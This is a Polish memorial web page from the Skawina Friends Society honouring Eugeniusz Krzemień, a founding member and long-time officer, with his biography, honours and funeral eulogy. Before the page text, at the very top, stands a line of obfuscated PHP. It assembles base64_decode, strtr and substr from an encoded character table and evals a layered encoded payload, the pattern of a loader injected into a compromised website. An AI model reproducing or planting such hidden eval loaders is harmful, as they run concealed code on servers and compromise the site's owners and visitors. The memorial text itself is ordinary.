$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iRG9oSHpPY2luc0xDZ1V5R1JQbUt1UWVxRmpKWmF3QkFmVlRJZFdrYnhsdnByU3RZWE1ORWFQa215aXFkV1NjTkZCTW5sVll2dWJlQ1JLSnpwRVpPZ3JIakl3aGZvVVhER0xBc3h0UVRWYTlFcG1PRmFiUD0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> WSPOMNIENIE O EUGENIUSZU KRZEMIENIU | Towarzystwo Przyjaciół Skawiny

Towarzystwo Przyjaciół Skawiny

WSPOMNIENIE O EUGENIUSZU KRZEMIENIU

data dodania: 12 kwietnia 2014

Towarzystwo Przyjaciół Skawiny poniosło kolejną, niepowetowaną stratę: odszedł od nas na zawsze kol. Eugeniusz Krzemień.
Inż. Eugeniusz Krzemień pochodził z Wodzisławia Śląskiego. Z domu wyniósł religijne wychowanie, przywiązanie do Śląska i głęboki patriotyzm. Do Skawiny przyjechał w maju 1954 r., gdy powstała Huta Aluminium (pierwotna nazwa: Zakłady Metalurgiczne). Tu podjął pracę i założył rodzinę. W Hucie pracował do końca jej funkcjonowania. W końcowych latach był z-cą kierownika odlewni. Jako emeryt pracował jeszcze w wymiarze ½ etatu w dziale Głównego Technologa, a później w dziale marketingu. Kiedy powstała spółka „ Benda-Lutz Skawina”, utworzona przez Zakłady Metalurgiczne i zakład „Benda-Lutz Werke” z Austrii, pełnił także rolę tłumacza ze strony Z.M.
W swojej karierze zawodowej miał także okres pracy pedagogicznej w Liceum Ogólnokształcącym w Skawinie i w Technikum Elektryczno-Mechanicznym. Lubił pracę z młodzieżą. Wspólnie rozpoczęliśmy współpracę Liceum Ogólnokształcącego z Gimnazjum w SanktAugustin w Niemczech i wymianę młodzieży, która trwała kilkanaście lat.
W TPS był od początku jego istnienia – należał do założycieli. Był członkiem I Komisji Rewizyjnej – od czerwca 1981 r. i kolejnych – do 6 września 2005 r., kiedy to został wybrany Wiceprzewodniczącym Zarządu.
Aktywnie uczestniczył w działalności TPS, był pomysłodawcą wielu inicjatyw. Wspólnie ze Zbigniewem Raczyńskim redagował w latach 1982-1983 gazetkę ścienną w rynku, prezentującą zabytki Skawiny, aktualności w mieście i działalność TPS. Za swoją działalność został wyróżniony tytułem: „Zasłużony Członek TPS” w 2011 r.
Był też wieloletnim członkiem Skawińskiego Stowarzyszenia Partnerstwa Miast, od początku kontaktów pomiędzy niemieckim miastem Hürth i Skawiną. Pełnił rolę tłumacza podczas spotkań i oficjalnych wizyt. W latach 1997 – 2005 był członkiem zarządu SSPM ( I i II kadencja).
Za swoją działalność zawodową otrzymał odznaczenia: Srebrny Krzyż Zasługi (1973 r.), Złoty Krzyż Zasługi (1980 r.) i Krzyż Kawalerski Orderu Odrodzenia Polski (1989 r.).
Był szlachetnym człowiekiem, cenionym m.in. za wysoką kulturę osobistą i życzliwość w kontaktach międzyludzkich, solidną pracę i działalność społeczną. Swoim dzieciom i wnukom przekazywał wartości wyniesione z rodzinnego domu.
Zmarł 3 IV br. Odszedł niespodziewanie po krótkiej chorobie, w wieku 80 lat. Pożegnaliśmy Go 7 kwietnia. Uroczystość pogrzebowa rozpoczęła się Mszą Św. w kościele Miłosierdzia Bożego a pochowany został na Cmentarzu Komunalnym w Skawinie. W ostatniej drodze towarzyszyła Mu rodzina, przedstawiciele TPS, SSPM, byli koledzy z pracy, przyjaciele i znajomi. Obecny był przedstawiciel miasta Hürth – były deputowany do CDU Bundestagu Willi Zylajew oraz Dieter Lutz z małżonką – jeden z właścicieli Benda-Lutz w Austrii.
Członkowie TPS żegnali Eugeniusza ze sztandarem, do którego była przypięta czarna żałobna wstęga. Przewodniczący Zarządu – Stanisław Grodecki przypomniał Jego zasługi dla TPS i pożegnał Go w imieniu członków Towarzystwa:

Rodzina, znajomi, przyjaciele, przedstawiciele organizacji pozarządowych ze Skawiny, z kraju i zza granicy żegnają dzisiaj Eugeniusza Krzemienia.
Ale w sposób szczególny, ze sztandarem owianym żałobną czarną wstęgą pożegnają Go członkowie i sympatycy Towarzystwa Przyjaciół Skawiny.
Śp. Eugeniusz był jednym z pomysłodawców, inicjatorów i założycieli TPS. Blisko trzydzieści lat był i działał we władzach TPS, poświęcając mu swoją wiedzę, doświadczenie, umiejętności, nie szczędząc swego czasu. Był pomysłodawcą wielu cennych i innowacyjnych działań stowarzyszenia. Zanim powstał Biuletyn Informacyjny TPS, przemianowany później na Informator TPS, pan Eugeniusz na początku lat osiemdziesiątych informował mieszkańców Skawiny o wydarzeniach w mieście, historii Skawiny i działalności TPS za pomocą tablicy informacyjnej na skawińskim Rynku. Informacje te były regularnie aktualizowane. Tablica informacyjna była często oblegana przez mieszkańców miasta.
Za swoją działalność w roku 2011 otrzymał tytuł „Zasłużonego Członka Towarzystwa Przyjaciół Skawiny”.
Ale pan Eugeniusz był nie tylko działaczem TPS. Był przede wszystkim człowiekiem, którego wysoka kultura osobista, umiejętności i dyscyplina osobista zjednywała mu wielu przyjaciół. Wokół siebie emitował pozytywną aurę i energię. Nawet najbardziej ostre dyskusje, ostre wymiany zdań w obecności pana Eugeniusza musiały przerodzić się w kulturalna i merytoryczna dyskusję.
Pamięć o śp. Eugeniuszu Krzemieniu pozostanie w sercach i myślach członków Towarzystwa Przyjaciół Skawiny na zawsze.